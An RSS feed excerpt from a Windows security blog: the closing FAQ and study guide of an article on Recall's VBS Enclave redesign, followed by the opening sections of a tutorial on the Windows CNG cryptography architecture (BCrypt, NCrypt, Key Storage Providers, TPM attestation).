No. As covered in §5, a VBS Enclave is a sub-region of a VTL0 host process that is promoted to VTL1 by the Secure Kernel [@rec-06]. An IUM trustlet (e.g., LsaIso, which backs Credential Guard) is a full Isolated User Mode process that runs wholly in VTL1. Both rely on the same hypervisor partition and Secure Kernel substrate, and the MSRC servicing criteria treat both under the VBS boundary policy [@rec-11], but the patterns are architecturally distinct. Microsoft&apos;s own documentation uses &quot;VBS Enclave&quot; terminology for the Recall case throughout [@rec-03] [@rec-06] [@rec-07].

Click to Do is a separate Copilot+ feature with a separate but partially overlapping privacy story; the November 22, 2024 Insider blog [@rec-04] bundles the two opt-in flows in the same first-run experience. Click to Do operates on the *current* screen rather than a history of past screens, and it does not maintain a persistent corpus. The bundling is a UX choice, not an architectural sharing of the snapshot store.

No, even as administrator. The Snapshot Store holds AES-256-GCM ciphertext; the per-snapshot keys are derivable only inside the enclave; the master is sealed by the TPM and released to the enclave only on a fresh Hello attestation. An administrator with full filesystem access to the snapshot directory reads ciphertext [@rec-03] [@rec-11]. The Hagenah AIXHost.exe class [@rec-12] is *post-authentication* extraction from the UI host&apos;s address space, not an administrator-side read of the encrypted data. The cryptographic chain holds against admin; the seam is at the UI plane.
&lt;p&gt;The arc this article walks -- a vendor ships, an audit lands, the vendor re-architects, an audit finds a seam, the vendor confirms the seam was in the published model -- is what the security feedback loop looks like when it works as designed. Naming each phase is what lets a reader recognise the same loop the next time a major Windows feature ships. The architecture diagram that ships with the &lt;em&gt;next&lt;/em&gt; personal-data feature out of Redmond will, if the pattern holds, label its UI host the way Davuluri&apos;s labels the Recall UI: as untrusted, in writing, in advance. The reader who has walked this far should know to look for that label, and to evaluate the feature on whether the architecture &lt;em&gt;names&lt;/em&gt; its seam rather than hiding it.&lt;/p&gt;

On a Copilot+ PC, the following PowerShell cmdlets (run as administrator) give you the device-side view: `Get-Tpm` for TPM 2.0 presence and Pluton attestation; `Get-CimInstance -Namespace root\cimv2\Security\MicrosoftTpm -ClassName Win32_Tpm` for detailed TPM state; `Get-LocalUser | Where-Object Enabled` plus the Hello enrolment surface in Settings for Hello ESS state; `Get-MpComputerStatus` for Defender status; and the Intune device-status portal for `AllowRecallEnablement` and related policies [@rec-08]. The §10 audit-script logic above describes the cross-check structure.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;microsoft-recall-vbs-enclave-re-architecture&quot; keyTerms={[
  { term: &quot;VBS Enclave&quot;, definition: &quot;A software-based trusted execution environment inside the address space of a host application, isolated from the host and from the rest of the OS via VTL1 promotion by the Secure Kernel.&quot; },
  { term: &quot;VTL1 / Secure Kernel&quot;, definition: &quot;Virtual Trust Level 1, the hypervisor-partitioned trust domain that hosts Isolated User Mode trustlets and VBS Enclaves; the Secure Kernel is the signed component that enforces the boundary.&quot; },
  { term: &quot;TPM 2.0 sealing&quot;, definition: &quot;Binding a key to platform state and user identity such that the TPM releases it only when the bound preconditions are met; the Recall master key is TPM-sealed.&quot; },
  { term: &quot;Hello ESS&quot;, definition: &quot;Windows Hello Enhanced Sign-in Security; runs the biometric matching algorithm in VBS and authenticates the sensor-to-VBS path with a certificate-authenticated channel.&quot; },
  { term: &quot;Purview EDM&quot;, definition: &quot;Microsoft Purview Exact Data Match; the in-enclave classifier that strips credentials, national IDs, and payment-card numbers from OCR output before persistence.&quot; },
  { term: &quot;AES-256-GCM&quot;, definition: &quot;NIST SP 800-38D authenticated encryption with associated data; the per-snapshot AEAD primitive Recall uses inside the enclave.&quot; },
  { term: &quot;Pluton&quot;, definition: &quot;Microsoft&apos;s integrated security processor; replaces the off-die LPC/SPI bus path of a discrete TPM with in-package TPM 2.0 services on the system-on-chip.&quot; },
  { term: &quot;PPL (Protected Process Light)&quot;, definition: &quot;Windows process-protection level governing which signers may inject into or read the memory of a target; the Recall Snapshot Service is a PPL, the Recall UI host (AIXHost.exe) is not.&quot; },
  { term: &quot;AIXHost.exe&quot;, definition: &quot;The Recall UI host process; runs in VTL0 outside the enclave and is the target of the April 2026 TotalRecall Reloaded DLL injection.&quot; },
  { term: &quot;AppContainer&quot;, definition: &quot;Windows process-isolation primitive that restricts a process to an explicit capability list at launch; a UI host running inside an AppContainer could not load arbitrary DLLs because the capability set would not include the inter-process token-and-memory-access capabilities the TotalRecall Reloaded injector relies on.&quot; },
  { term: &quot;TotalRecall / TotalRecall Reloaded&quot;, definition: &quot;Alexander Hagenah&apos;s open-source extraction tools against, respectively, the May 2024 Recall preview (plaintext SQLite) and the April 2026 Recall GA (UI-host DLL injection).&quot; }
]} questions={[
  { q: &quot;Why did the SYSTEM-only filesystem ACL on the original Recall directory fail to act as an isolation boundary?&quot;, a: &quot;Because a same-user process can impersonate a SYSTEM-context service that handles user-supplied input and obtain SYSTEM-context file access without elevation, as Forshaw demonstrated in &apos;Working your way Around an ACL&apos; on June 3, 2024.&quot; },
  { q: &quot;What four primitives compose into the September 27, 2024 architecture, and which one was new in 2024?&quot;, a: &quot;VBS Enclaves (shipped in SQL Server 2019), TPM 2.0 sealing (shipped since 2012), Hello ESS (shipped at the Windows 11 launch), and Purview EDM (shipped with the Microsoft Purview enterprise product). None was new in 2024; the composition was.&quot; },
  { q: &quot;Why is the AIXHost.exe DLL injection &apos;not a vulnerability&apos; by MSRC&apos;s published servicing criteria?&quot;, a: &quot;Because same-user post-authentication code is not listed as a security boundary in the MSRC criteria, and the September 27 architecture explicitly labels the UI host as untrusted. The behaviour operates within the published model, which is the test MSRC applies.&quot; },
  { q: &quot;What single property would Recall need to add to check all six of the &apos;ideal&apos; on-device-personal-context properties?&quot;, a: &quot;TEE-isolated plaintext delivery to the UI plane. The current architecture isolates compute and storage but releases plaintext into a VTL0 user-mode UI host (AIXHost.exe); a Generation 6 design that ran the UI in a high-signer PPL with AppContainer-restricted code loading and WDAC enforcement would close the seam.&quot; },
  { q: &quot;What does the &apos;cryptographic boundary above the filesystem&apos; phrase mean in concrete terms?&quot;, a: &quot;Even a process with full filesystem access to the Snapshot Store finds only AES-256-GCM ciphertext. The per-snapshot keys exist only inside the VBS Enclave; the master is sealed by the TPM and released only on a fresh Hello attestation. The boundary is at the enclave, not at the file.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>recall</category><category>vbs-enclaves</category><category>pluton</category><category>tpm</category><category>windows-hello</category><category>copilot-plus-pcs</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>CNG Architecture: BCrypt, NCrypt, KSPs, and How Windows Picks Its Algorithms</title><link>https://paragmali.com/blog/cng-architecture-bcrypt-ncrypt-ksps/</link><guid isPermaLink="true">https://paragmali.com/blog/cng-architecture-bcrypt-ncrypt-ksps/</guid><description>A guided tour of the Cryptography API: Next Generation -- the two-tier API, the Key Storage Provider model, the FIPS toggle, and how PQC slots in.</description><pubDate>Sat, 16 May 2026 00:00:00 GMT</pubDate><content:encoded>
Since Windows Vista, every piece of cryptography in Windows -- TLS, BitLocker, Authenticode, Windows Hello, DPAPI -- flows through the **Cryptography API: Next Generation (CNG)**. CNG splits the world into two layers. **BCrypt** does primitives: AES, SHA, HMAC, RNG, key derivation. **NCrypt** routes calls to a **Key Storage Provider (KSP)** that owns the long-lived private keys: software, TPM, smart card, or a third-party HSM. Algorithm selection is governed by a registered provider-priority list, the Schannel cipher-suite order, and a single FIPS-mode toggle that flips Windows into its validated subset. Windows 11 24H2 added the first post-quantum primitives (ML-KEM, ML-DSA) to the same surface, with no API break. This article walks through how that machine works, why Microsoft designed it that way, and where it leaks.
&lt;h2&gt;1. From CAPI to CNG: why Microsoft started over&lt;/h2&gt;
&lt;p&gt;In the late 1990s, Microsoft shipped its first general cryptographic API. The original Cryptographic Service Providers (CAPI) model [@learn-microsoft-com-service-providers] arrived in Windows NT 4.0 Service Pack 4 in 1998 and defined a plug-in unit called a Cryptographic Service Provider, or CSP. A CSP was a monolithic DLL: it owned the algorithm implementations, the key storage, and the export-control posture all at once. If you wanted to add hardware-backed RSA on Windows NT, you wrote a CSP. If you wanted to add a new hash function, you also wrote a CSP. The model worked for the algorithms Microsoft had in mind when it designed it.&lt;/p&gt;
&lt;p&gt;Then the algorithms changed.&lt;/p&gt;
&lt;p&gt;AES was standardized in 2001, after CAPI&apos;s design was already frozen. Microsoft retrofitted AES into the original architecture by shipping the Microsoft Enhanced RSA and AES Cryptographic Provider [@learn-microsoft-com-cryptographic-provider] as a separate CSP, sitting alongside the original Microsoft Base Cryptographic Provider. Elliptic-curve cryptography was even more awkward: CAPI&apos;s algorithm identifiers and key-blob formats had no place for ECC curves. Every new algorithm required a new CSP or a new release of an existing one. The plug-in surface was rigid, the FIPS validation story was painful, and the API was relentlessly C-shaped in ways that made auditing hard.Microsoft was not alone. The same era produced Intel&apos;s Common Data Security Architecture (CDSA) [@en-wikipedia-org-os-2] and several short-lived crypto frameworks for OS/2 and other platforms. Most of them disappeared. CAPI&apos;s longevity owed more to Windows market share than to its design.&lt;/p&gt;
&lt;p&gt;By 2005, Microsoft started over. The result was the Cryptography API: Next Generation, or CNG, which shipped with Windows Vista and Windows Server 2008 in January 2007 [@learn-microsoft-com-cng-portal]. CNG was not a refactor. It was a clean second system, designed from a different set of assumptions: algorithms would keep arriving, key storage needed to be a separate concern, FIPS validation had to be a first-class output, and the same API had to work in user mode and kernel mode.&lt;/p&gt;

The Windows cryptographic API introduced in Vista (2007) as the long-term replacement for CAPI. CNG splits cryptography into a primitives layer (`bcrypt.h`, `bcryptprimitives.dll`) and a key-storage layer (`ncrypt.h`, `ncrypt.dll`), each pluggable through registered providers. Used by every modern Windows component that touches cryptography.

The plug-in unit of the legacy CAPI architecture (1998-onward). A CSP bundled algorithms, key storage, and FIPS posture into a single DLL. Largely superseded by CNG providers, but still present on the system for backwards compatibility.
&lt;p&gt;The three design pillars Microsoft committed to in the CNG portal documentation were modularity, cryptographic agility, and FIPS-compliance readiness [@learn-microsoft-com-cng-features]. All three would matter twenty years later when post-quantum cryptography arrived without warning the protocol authors. We will get to that.&lt;/p&gt;

Throughout this article, &quot;BCrypt&quot; refers to Microsoft&apos;s CNG primitives header `bcrypt.h` and its companion DLL `bcryptprimitives.dll`. It is not the Provos-Mazieres password-hashing function of the same name, which is unrelated and uses a different spelling in most academic literature (&quot;bcrypt&quot;). The naming collision is unfortunate but firmly entrenched in Windows.
&lt;h2&gt;2. BCrypt: the symmetric stack and the ephemeral key&lt;/h2&gt;
&lt;p&gt;Open a Visual Studio project, include &lt;code&gt;&amp;lt;bcrypt.h&amp;gt;&lt;/code&gt;, link &lt;code&gt;bcrypt.lib&lt;/code&gt;, and you have access to almost every cryptographic primitive Windows ships. AES in CBC, CFB, ECB, GCM, and CCM modes. SHA-1, SHA-256, SHA-384, SHA-512, the SHA-3 family, and the cSHAKE128 and cSHAKE256 extendable-output functions added in Windows 11 24H2 [@learn-microsoft-com-algorithm-identifiers]. HMAC over any of those hashes. PBKDF2. The NIST SP 800-108 key-derivation construction. The DRBG-based random number generator drawn from NIST SP 800-90 [@csrc-nist-gov-1-final]. Ephemeral asymmetric operations -- RSA encrypt, ECDSA sign, ECDH key agreement -- on key handles that vanish when the process exits.&lt;/p&gt;
&lt;p&gt;The canonical BCrypt opening dance is four calls.&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode mirroring the BCryptOpenAlgorithmProvider flow.
// In real C: NTSTATUS values, BCRYPT_ALG_HANDLE, etc.&lt;/p&gt;
&lt;p&gt;const algId       = &quot;AES&quot;;           // wide string
const impl        = null;            // null -&amp;gt; walk the priority list
const flags       = 0;&lt;/p&gt;
&lt;p&gt;const hAlg        = BCryptOpenAlgorithmProvider(algId, impl, flags);
BCryptSetProperty(hAlg, &quot;ChainingMode&quot;, &quot;ChainingModeGCM&quot;);&lt;/p&gt;
&lt;p&gt;const hKey        = BCryptGenerateSymmetricKey(hAlg, keyBytes);
const ciphertext  = BCryptEncrypt(hKey, plaintext, authInfo);&lt;/p&gt;
&lt;p&gt;BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
`}&lt;/p&gt;
&lt;p&gt;The interesting parameter is &lt;code&gt;impl&lt;/code&gt;. When it is &lt;code&gt;NULL&lt;/code&gt;, &lt;code&gt;BCryptOpenAlgorithmProvider&lt;/code&gt; &quot;attempts to open each registered provider, in order of priority, for the algorithm specified by the pszAlgId parameter and returns the handle of the first provider that is successfully opened&quot; [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider]. That sentence is the whole story of CNG provider priority in nineteen words.&lt;/p&gt;
&lt;p&gt;Algorithm identifiers are wide strings. &lt;code&gt;L&quot;AES&quot;&lt;/code&gt;, &lt;code&gt;L&quot;SHA256&quot;&lt;/code&gt;, &lt;code&gt;L&quot;RSA&quot;&lt;/code&gt;, &lt;code&gt;L&quot;ML-KEM&quot;&lt;/code&gt;, &lt;code&gt;L&quot;ML-DSA&quot;&lt;/code&gt;, &lt;code&gt;L&quot;CHACHA20_POLY1305&quot;&lt;/code&gt;, &lt;code&gt;L&quot;CSHAKE128&quot;&lt;/code&gt;. Each string is registered in CNG&apos;s configuration store under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\&lt;/code&gt;, with a per-algorithm ordered list of providers that claim to implement it. Add a new algorithm and you add a new string. Add a new provider and you append to its priority list. The API surface does not change.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The algorithm-identifier string is the seam where cryptographic agility lives. As long as your protocol can encode &quot;use whatever the spec calls AES-256-GCM,&quot; and as long as a CNG provider answers to that name, you can swap implementations without touching the calling code. Protocols whose wire format hard-codes the algorithm (the old SSL 3.0 cipher list, for example) do not get this benefit no matter what crypto API they call.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Underneath the API is a single implementation library. Microsoft&apos;s SymCrypt [@github-com-microsoft-symcrypt] has been the actual workhorse since Windows 10 version 1703: &quot;SymCrypt is the core cryptographic function library currently used by Windows... Since the 1703 release of Windows 10, SymCrypt has been the primary crypto library for all algorithms in Windows.&quot; SymCrypt is open source. It carries hand-tuned assembly for AES-NI, VAES, SHA-NI, and PCLMULQDQ on x64, plus ARM64 SHA and AES intrinsics. On a modern Xeon, AES-GCM throughput from BCrypt routinely sits in the 4 to 8 GB/s range per core.&lt;/p&gt;
&lt;p&gt;SymCrypt&apos;s open-source release in 2019 was a quiet event for a Microsoft library: the algorithms that protect Windows are reviewable by anyone willing to read C and ARM/x64 assembly.&lt;/p&gt;
&lt;p&gt;BCrypt keys are ephemeral by construction. A &lt;code&gt;BCRYPT_KEY_HANDLE&lt;/code&gt; lives in your process and dies with it. If you want to keep a private key around between processes, between reboots, or between machines, you do not use BCrypt. You use NCrypt.&lt;/p&gt;
&lt;p&gt;That distinction is the first thing developers get wrong when they meet CNG. The second thing they get wrong is forgetting that BCrypt&apos;s GCM API does not allocate nonces for you. The NIST SP 800-38D specification of Galois/Counter Mode [@nvlpubs-nist-gov-nistspecialpublication800-38dpdf] is famously brittle under nonce reuse: a single repeated nonce under the same key destroys both confidentiality (XOR of plaintexts leaks) and authenticity (the GHASH authentication key becomes recoverable). With 96-bit random nonces the birthday bound limits safe usage to roughly $2^{32}$ invocations per key before collision probability becomes meaningful. Counter-based nonces sidestep the birthday bound entirely but require persistent state. CNG does neither for you. That part is your problem.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; First, &lt;strong&gt;GCM nonce reuse&lt;/strong&gt;: &lt;code&gt;BCryptEncrypt&lt;/code&gt; with &lt;code&gt;BCRYPT_CHAIN_MODE_GCM&lt;/code&gt; accepts whatever 12 bytes you hand it. Counter or random, but never twice. Second, &lt;strong&gt;algorithm string drift&lt;/strong&gt;: &lt;code&gt;BCRYPT_SHA256_ALGORITHM&lt;/code&gt; is the macro for &lt;code&gt;L&quot;SHA256&quot;&lt;/code&gt;. &lt;code&gt;L&quot;SHA-256&quot;&lt;/code&gt; returns &lt;code&gt;STATUS_NOT_FOUND&lt;/code&gt;. Third, &lt;strong&gt;kernel-mode pseudo-handles&lt;/strong&gt;: the convenient &lt;code&gt;BCRYPT_AES_ALG_HANDLE&lt;/code&gt; shortcut is user-mode only per the BCryptOpenAlgorithmProvider remarks [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider]; kernel drivers must use real handles.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Windows 10 added pseudo-handles -- pre-baked handle constants like &lt;code&gt;BCRYPT_AES_ALG_HANDLE&lt;/code&gt; and &lt;code&gt;BCRYPT_SHA256_ALG_HANDLE&lt;/code&gt; -- that skip the provider lookup for the built-in algorithms. The 24H2 release extended that list to include &lt;code&gt;BCRYPT_MLKEM_ALG_HANDLE&lt;/code&gt; and the cSHAKE handles. Microsoft now recommends pseudo-handles over &lt;code&gt;BCryptOpenAlgorithmProvider&lt;/code&gt; for new code [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider] when the algorithm is built in. The motivation is performance: pseudo-handles bypass the per-call provider walk and the configuration-store lookup.&lt;/p&gt;
&lt;p&gt;That covers the primitives. Now we need a place to keep the keys.&lt;/p&gt;
&lt;h2&gt;3. NCrypt: where the long-lived secrets live&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;ncrypt.h&lt;/code&gt; header opens a different door. Every function in the NCrypt API surface [@learn-microsoft-com-api-ncrypt] -- &lt;code&gt;NCryptOpenStorageProvider&lt;/code&gt;, &lt;code&gt;NCryptCreatePersistedKey&lt;/code&gt;, &lt;code&gt;NCryptOpenKey&lt;/code&gt;, &lt;code&gt;NCryptSignHash&lt;/code&gt;, &lt;code&gt;NCryptDecrypt&lt;/code&gt;, &lt;code&gt;NCryptKeyDerivation&lt;/code&gt;, &lt;code&gt;NCryptExportKey&lt;/code&gt;, &lt;code&gt;NCryptProtectSecret&lt;/code&gt; -- begins by routing the call through &lt;code&gt;ncrypt.dll&lt;/code&gt;, which acts as a router rather than an implementation. The router decides which Key Storage Provider handles the operation and forwards the call.&lt;/p&gt;
&lt;p&gt;That routing layer is the architectural distinction Microsoft has insisted on for two decades. Microsoft&apos;s Key Storage and Retrieval documentation [@learn-microsoft-com-and-retrieval] describes it like this: the NCrypt router &quot;conceals details, such as key isolation, from both the application and the storage provider itself.&quot; Translation: the application calls &lt;code&gt;NCryptSignHash&lt;/code&gt; and gets back a signature. It does not know -- and should not need to know -- whether the key lives in &lt;code&gt;%APPDATA%&lt;/code&gt;, inside a TPM chip on the motherboard, on a smart card halfway across the room, or in a network-attached hardware security module in a data center on a different continent.&lt;/p&gt;

A registered plug-in DLL that owns persistent private-key material and exposes it through the NCrypt API. Microsoft ships four built-in KSPs (Software, Platform/TPM, Smart Card, and the CNG-DPAPI provider); third parties ship KSPs for HSM appliances, USB security keys, and cloud key services. Selecting a KSP is a matter of passing the right name string to `NCryptOpenStorageProvider`.
&lt;p&gt;The mechanical flow for creating a persisted key looks like this.&lt;/p&gt;

sequenceDiagram
    participant App as Application
    participant Router as ncrypt.dll (NCrypt router)
    participant KSP as Microsoft Software KSP
    participant LSA as LSA key-isolation process
    participant Disk as %APPDATA%\Microsoft\Crypto\Keys\&lt;pre&gt;&lt;code&gt;App-&amp;gt;&amp;gt;Router: NCryptOpenStorageProvider(&quot;Microsoft Software Key Storage Provider&quot;)
Router--&amp;gt;&amp;gt;App: hProvider
App-&amp;gt;&amp;gt;Router: NCryptCreatePersistedKey(hProvider, &quot;RSA&quot;, &quot;MyKey&quot;, 2048, ...)
Router-&amp;gt;&amp;gt;KSP: dispatch via registered KSP entry points
KSP-&amp;gt;&amp;gt;LSA: LRPC: generate key, return handle
LSA-&amp;gt;&amp;gt;Disk: write DPAPI-wrapped private blob
LSA--&amp;gt;&amp;gt;KSP: ok
KSP--&amp;gt;&amp;gt;Router: hKey
Router--&amp;gt;&amp;gt;App: hKey
App-&amp;gt;&amp;gt;Router: NCryptSignHash(hKey, digest)
Router-&amp;gt;&amp;gt;KSP: forward
KSP-&amp;gt;&amp;gt;LSA: LRPC: sign with isolated key
LSA--&amp;gt;&amp;gt;KSP: signature
KSP--&amp;gt;&amp;gt;Router: signature
Router--&amp;gt;&amp;gt;App: signature
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Two facts about that diagram matter. First, the private key bits never enter the calling process. They are generated inside the LSA process and the calling application only ever receives a handle and the eventual signature. Second, the LRPC hop is real: it costs roughly 30 to 100 microseconds per call on modern hardware. For bulk symmetric encryption you would not want this overhead, which is why CNG&apos;s design pushes you toward BCrypt for symmetric work and reserves NCrypt for the rarer, smaller, and more sensitive operations on long-lived asymmetric keys.The LSA key-isolation process is &lt;code&gt;lsaiso.exe&lt;/code&gt; on systems with Credential Guard enabled, hosted inside the Virtualization-Based Security (VBS) trustlet boundary. On systems without VBS, the role is played by &lt;code&gt;lsass.exe&lt;/code&gt; itself. Either way, key material does not enter the application&apos;s address space.&lt;/p&gt;
&lt;p&gt;NCrypt is also where the asymmetric algorithms live in their persistent form. The Microsoft Software Key Storage Provider claims RSA keys from 512 to 16384 bits in 64-bit increments, DSA, DH, and ECDSA/ECDH on the NIST P-256, P-384, and P-521 curves [@learn-microsoft-com-and-retrieval]. Windows 11 24H2 added ML-KEM at the 512, 768, and 1024 parameter sets and ML-DSA at the 44, 65, and 87 parameter sets to the Software KSP&apos;s repertoire.&lt;/p&gt;
&lt;p&gt;The split between BCrypt and NCrypt is sometimes confusing because there is overlap. You can sign with BCrypt&apos;s &lt;code&gt;BCryptSignHash&lt;/code&gt; if you generated an ephemeral key pair. You can also sign with NCrypt&apos;s &lt;code&gt;NCryptSignHash&lt;/code&gt; if the key is persisted in a KSP. The rule of thumb is: if the key needs to survive the process, use NCrypt; if it does not, use BCrypt. Real-world Windows code skews heavily toward NCrypt for asymmetric operations because almost every interesting asymmetric key has an associated certificate, and certificates outlive processes.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The four Microsoft KSP name strings are &lt;code&gt;MS_KEY_STORAGE_PROVIDER&lt;/code&gt; (Software), &lt;code&gt;MS_PLATFORM_KEY_STORAGE_PROVIDER&lt;/code&gt; (TPM/Pluton), &lt;code&gt;MS_SMART_CARD_KEY_STORAGE_PROVIDER&lt;/code&gt;, and &lt;code&gt;MS_NGC_KEY_STORAGE_PROVIDER&lt;/code&gt; (Next Generation Credentials, used by Windows Hello). Typo any of these and you silently fall through to the Software KSP, which is a recurring source of &quot;why is my key on disk instead of in the TPM&quot; incident reports.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The router lets the application speak one language and have the storage backend vary. That makes the KSP plug-in model the most interesting piece of the architecture, and it deserves its own section.&lt;/p&gt;
&lt;h2&gt;4. The KSP model: one API, many places to keep keys&lt;/h2&gt;
&lt;p&gt;A KSP is a DLL on disk and an entry in the registry. The DLL exports a fixed set of function pointers that mirror NCrypt&apos;s API. The registry entry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Microsoft Software Key Storage Provider&lt;/code&gt; (and its siblings) tells &lt;code&gt;ncrypt.dll&lt;/code&gt; which DLL to load when an application asks for a provider by name. That is the whole interface contract. If you can produce a DLL that implements the entry points and you can install a registry entry, you have a CNG KSP.&lt;/p&gt;
&lt;p&gt;The platform comes with four. They sit on a spectrum from &quot;your operating system is the entire trust boundary&quot; to &quot;the keys live on a separate piece of silicon and only signatures come back.&quot;&lt;/p&gt;

flowchart LR
    A[&quot;Microsoft Software KSP -- private keys on disk -- (DPAPI-wrapped)&quot;] --&amp;gt; B[&quot;Microsoft Platform Crypto Provider -- TPM 2.0 or Pluton -- on-CPU silicon&quot;]
    B --&amp;gt; C[&quot;Microsoft Smart Card KSP -- removable hardware token -- (PIV, CAC, Yubikey)&quot;]
    C --&amp;gt; D[&quot;Third-party HSM KSP -- Thales Luna, Entrust nShield, -- YubiHSM 2, AWS CloudHSM&quot;]
    A -.-&amp;gt; A1[&quot;~10^4 RSA-2048 sign/sec -- FIPS 140-2 L1&quot;]
    B -.-&amp;gt; B1[&quot;~1-10 sign/sec -- TPM vendor cert&quot;]
    C -.-&amp;gt; C1[&quot;~1-5 sign/sec -- card vendor cert&quot;]
    D -.-&amp;gt; D1[&quot;~10^2-10^4 sign/sec -- FIPS 140-2/-3 L3 typical&quot;]
&lt;h3&gt;4.1 The Microsoft Software KSP&lt;/h3&gt;
&lt;p&gt;The default. If you pass &lt;code&gt;NULL&lt;/code&gt; for the provider name in &lt;code&gt;NCryptOpenStorageProvider&lt;/code&gt;, you get this one. It stores per-user private keys at &lt;code&gt;%APPDATA%\Microsoft\Crypto\Keys\&lt;/code&gt; and per-machine keys at &lt;code&gt;%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\SystemKeys\&lt;/code&gt;, with each file-level blob further protected by DPAPI under either the user master key or the LocalSystem (&lt;code&gt;S-1-5-18&lt;/code&gt;) master key. The private-key operations dispatch through LRPC into the LSA key-isolation process so that even with administrator privileges on the machine, naive code-injection into the application&apos;s address space does not yield key bits.&lt;/p&gt;
&lt;p&gt;The Microsoft Software KSP is also the only KSP that runs inside the LSA key-isolation process. Third-party KSPs run in the calling application&apos;s process. That difference matters enormously for the threat model. Microsoft notes this explicitly: third-party KSPs &quot;do not run inside the LSA process&quot; [@learn-microsoft-com-and-retrieval]. If you are a third-party KSP that talks to remote HSM hardware, the isolation comes from the HSM itself, not from any Windows process boundary.&lt;/p&gt;
&lt;h3&gt;4.2 The Microsoft Platform Crypto Provider (TPM and Pluton)&lt;/h3&gt;
&lt;p&gt;The KSP that answers to &lt;code&gt;MS_PLATFORM_KEY_STORAGE_PROVIDER&lt;/code&gt; is the TPM&apos;s face to CNG. When you call &lt;code&gt;NCryptCreatePersistedKey&lt;/code&gt; against it, the TPM 2.0 chip itself [@learn-microsoft-com-tpm-fundamentals] generates the key under the protection of its Storage Root Key. The private bits never leave the chip. The application gets back a handle whose only operations are sign, decrypt, and key derivation -- the private key cannot be exported, and that property is enforced by physics, not by software policy.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Platform Crypto Provider is the place where CNG stops trusting the operating system and starts trusting a separate piece of silicon. Every TPM-backed key in Windows -- BitLocker&apos;s Volume Master Key wrapping, Windows Hello credentials, AD CS attestation-enrolled machine identities -- enters and exits through this single KSP name.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft Pluton, the security processor that shipped in 2022 on AMD Ryzen 6000, Snapdragon 8cx Gen 3, and Intel Core Ultra Series 2 silicon, is exposed to Windows as a TPM 2.0 device behind the same Platform Crypto Provider name [@learn-microsoft-com-security-processor]. Application code that worked against a discrete TPM works against Pluton with no changes. Pluton&apos;s wins are at the supply-chain layer (no SPI bus to physically tap between the chip and the CPU) and the firmware-update layer (Pluton firmware ships via Windows Update). The Windows-facing API is intentionally identical.&lt;/p&gt;
&lt;h3&gt;4.3 The Microsoft Smart Card KSP&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;MS_SMART_CARD_KEY_STORAGE_PROVIDER&lt;/code&gt; is a single KSP that routes to whichever vendor minidriver claims the inserted card. The minidriver model is Microsoft&apos;s plug-in layer below the KSP layer: smart-card vendors do not write CNG KSPs, they write minidrivers, and Microsoft&apos;s single KSP fans the calls out to them via the APDU protocol. Cards that follow Microsoft&apos;s Generic Identity Device Specification (GIDS) [@learn-microsoft-com-device-specification] work without a vendor minidriver. Cards that do not, including most US federal PIV cards before about 2015, ship vendor-specific minidrivers.&lt;/p&gt;
&lt;p&gt;This is the layer that powers Windows Hello for Business &quot;virtual smart card&quot; credentials, which present a TPM-backed key through the smart-card path because so much enterprise software already knew how to talk to PIV-style cards.&lt;/p&gt;
&lt;h3&gt;4.4 Third-party HSM and security-key KSPs&lt;/h3&gt;
&lt;p&gt;YubiHSM 2, Thales Luna, Entrust nShield, AWS CloudHSM Client for Windows, and various cloud-KMS bridges all ship CNG KSPs. The KSP DLL pretends to be a local provider and proxies operations across whatever transport the device uses -- USB for a YubiHSM, PCIe or TCP for a Luna, HTTPS for a cloud HSM. Latency varies from microseconds for a USB device to a few milliseconds for a network HSM. The application code that calls &lt;code&gt;NCryptSignHash&lt;/code&gt; does not change.&lt;/p&gt;

For an internal Active Directory Certificate Services CA, the KSP choice is the entire trust story. A CA whose root key lives in the Software KSP can have that key extracted by any administrator. A CA whose root lives in a FIPS 140-2 Level 3 HSM KSP requires physical access to the HSM (often with multi-person key ceremonies) to recover the key. The application code in `certutil` is identical in both cases. The audit story is not.
&lt;h2&gt;5. The TPM KSP, attestation, and the hardware boundary&lt;/h2&gt;
&lt;p&gt;A TPM-bound key is a useful key, but a TPM-bound key with an attestation statement is a different kind of asset entirely. The Trusted Platform Module supports a primitive called key attestation: the TPM can sign a statement that says, &quot;this key was generated inside me, I will never let it out, and here is a chain of trust back to my Endorsement Key that proves I am a real TPM made by a real vendor.&quot; A certificate authority that requires this attestation can refuse to issue a certificate for any key that did not come from inside a TPM.&lt;/p&gt;
&lt;p&gt;Active Directory Certificate Services supports exactly this flow as &quot;TPM key attestation&quot; [@learn-microsoft-com-key-attestation]. The flow involves three keys: an Endorsement Key (EK) burned into the TPM at manufacture, an Attestation Identity Key (AIK) derived from the EK and certified by Microsoft or by the enterprise PKI, and the application key being attested. The AIK signs a statement covering the application key&apos;s properties; the CA verifies the AIK certificate chain and the statement, and only then issues a certificate.&lt;/p&gt;

flowchart TD
    EK[&quot;Endorsement Key (EK) -- burned into TPM at manufacture -- vendor cert from Intel/AMD/etc.&quot;]
    AIK[&quot;Attestation Identity Key (AIK) -- generated in TPM, certified by -- Microsoft EK CA or enterprise PKI&quot;]
